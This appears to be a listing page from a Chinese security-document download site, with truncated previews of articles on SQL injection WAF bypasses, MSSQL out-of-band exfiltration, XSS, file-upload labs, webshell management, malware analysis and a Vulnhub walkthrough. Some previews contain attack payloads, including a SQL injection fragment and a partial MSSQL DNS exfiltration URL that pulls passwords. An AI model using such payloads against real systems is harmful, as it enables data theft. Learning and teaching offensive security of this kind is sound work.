爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

CodeQL从入门到入土

# CodeQL 从入门到精通：静态代码分析与漏洞检测实战指南 ## 1. CodeQL 概述 ### 1.1 什么是 CodeQL CodeQL 是由 GitHub 开发的一种革命性的语义代码查询语言，它是一种强大的静态代码分析工具，基于高级数据流分析技术，能够深入理解代码结构、语义和行为。 **核心特点**： - 语义代码查询语言，能理解代码上下文 - 内置强大的数据流判断能力 - 可自定义补充各种例外场景 - 支持多种编程语言（C、C++、Java、Python等） - 提供丰富的

2025-08-18 09:26:01

「造轮子」一个文件上传靶场知识总结记录

# 文件上传漏洞全面解析与实战指南 ## 一、环境部署使用Docker一键部署文件上传靶场环境： ```bash # 进入项目文件夹 cd upload-labs-docker # 一键部署运行 docker-compose up -d ``` 默认13个关卡运行在30001-30013端口，如需自定义端口可修改docker-compose.yml文件。 ## 二、前端验证绕过(JS校验) ### 检测方法 - 上传文件时未抓到数据包就提示文件类型不正确 - 浏览器直接拦截上传请

2025-08-18 09:24:37

XSS 实战攻击思路总结

# XSS实战攻击思路总结 ## 前言本文总结了XSS(跨站脚本攻击)的多种实战攻击思路，通过实际案例演示如何利用XSS漏洞进行攻击。这些技术仅供网络安全学习和研究使用，禁止用于非法用途。 ## 钓鱼网站鉴别方法 ### 域名分析 1. 检查一级域名是否合法 - 示例：qq.xps.com中"qq"是二级域名，一级域名xps.com暴露了钓鱼本质 2. 注意拉丁字母伪造域名 - 示例： - 真域名：www.oppo.com - 假域名：www.οppο.

2025-08-18 09:23:18

浅谈js在挖掘CNVD通用漏洞中的思路，附实战案例

# JavaScript在挖掘CNVD通用漏洞中的思路与实战 ## 一、前言本文详细介绍了如何通过分析JavaScript文件来挖掘CNVD通用漏洞的思路和方法，并附有实战案例。JavaScript文件在现代Web应用中承载了大量业务逻辑和敏感信息，是漏洞挖掘的重要切入点。 ## 二、关键JavaScript文件定位 ### 1. 常见重要文件路径 - 配置文件： - `/config/index.js` - `/config/menu.js` - 包含特定关键词的文件

2025-08-18 09:22:18

MySQL绕过小结

# MySQL注入绕过技术详解 ## 0x01 前言本文总结了MySQL注入中各种绕过WAF(Web应用防火墙)的技术手段，围绕SQL语句中的五个关键位置进行详细分析，并提供实际示例和FUZZ方法。 ## 0x02 SQL注入关键位置分析在SQL注入中，可以将每个SQL关键字两侧可插入的点称为"位"，主要分为五个关键位置： ### 位置一：关键字前 1. **注释符** ```sql /**/union select 1,user,3 from admin /*

2025-08-18 09:21:40

高级的MSSQL注入技巧

# 高级MSSQL注入技巧详解 ## 1. DNS带外(OOB)数据泄露技术当遇到禁用堆栈查询的完全盲SQL注入时，可以通过以下函数实现DNS带外数据泄露： ### 1.1 使用`fn_xe_file_target_read_file()` ```sql https://vuln.app/getItem?id=1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+fro

2025-08-18 09:20:35

抱歉，无法读取该文件。请更新其他文件，我可以为你进行总结。

2025-08-18 09:19:42

【干货】一文掌握JavaScript检查对象空值的N种技巧！

# JavaScript检查对象空值的全面指南 ## 为什么需要检查对象空值在JavaScript开发中，检查对象是否为空是一项常见且重要的任务，主要原因包括： 1. **防止空引用错误**：避免尝试访问空对象属性时抛出`TypeError` 2. **数据验证**：表单提交前验证用户输入是否完整 3. **条件逻辑控制**：根据对象是否为空执行不同分支逻辑 4. **数据处理优化**：空对象时可跳过不必要的数据处理 5. **UI交互控制**：根据对象状态显示/隐藏界面元素 ## 原

2025-08-18 09:19:25

SpringWeb中获取路径前缀的方式与潜在的权限绕过风险

# Spring Web 中路径前缀获取方式与权限绕过风险分析 ## 1. 背景与问题概述在 Spring Web 应用中，路径前缀（Context Path）是 Web 应用部署时的基础路径，通常用于区分同一服务器上部署的不同应用。在权限控制场景中，路径前缀的正确处理至关重要，因为： 1. 权限系统通常基于完整路径进行访问控制 2. 路径前缀处理不当可能导致权限绕过风险 3. 不同环境下（开发/测试/生产）路径前缀可能不同 ## 2. Spring Web 中获取路径前缀的方式 #

2025-08-18 09:18:13

Vermin RAThole深度分析

# Vermin RAThole恶意软件家族深度分析教学文档 ## 1. 概述 Vermin RAThole是一组针对乌克兰政府机构的恶意软件家族，包括Quasar RAT、Sobaken和Vermin。这些恶意软件主要用于窃取数据和远程控制受害者系统。 ## 2. 攻击活动时间线 - **最早活动**：可追溯到2015年10月，实际可能更早 - **主要活跃期**：2017年中持续到2018年 - **不同家族使用时间**： - Quasar RAT：2015年10月-2016年4

2025-08-18 09:17:16

ALL-IN-ONE 拼图补全计划之：Webshell 管理

# Yaklang Webshell 管理功能详解 ## 一、功能概述 Yaklang v1.3.0 版本引入了试验性的网站管理功能，主要用于管理冰蝎(Behinder)、哥斯拉(Godzilla)等类型的Webshell。该功能提供了： - 存活探测 - 获取基础信息 - 命令执行 - 部分文件管理功能 **重要提示**：使用前必须获取合法授权，仅用于管理自己拥有的网站。 ## 二、支持的Webshell类型 ### 1. 哥斯拉(Godzilla)管理 **连接步骤**： 1.

2025-08-18 09:06:10

Vulnhub练习DC-5 完整复现

# DC-5 靶机渗透测试完整复现教程 ## 一、环境准备 ### 靶机信息 - 靶机名称: DC-5 (来自Vulnhub) - 可能的IP地址: 192.168.200.11 或 192.168.200.58 - 开放服务: HTTP (80端口), RPC (111端口), 其他(43853端口) ### 攻击机信息 - 系统: Kali Linux - IP地址: 192.168.200.14 ## 二、信息收集阶段 ### 1. 主机发现使用三种方法扫描网段内存活主机:

2025-08-18 09:05:30

跳转到页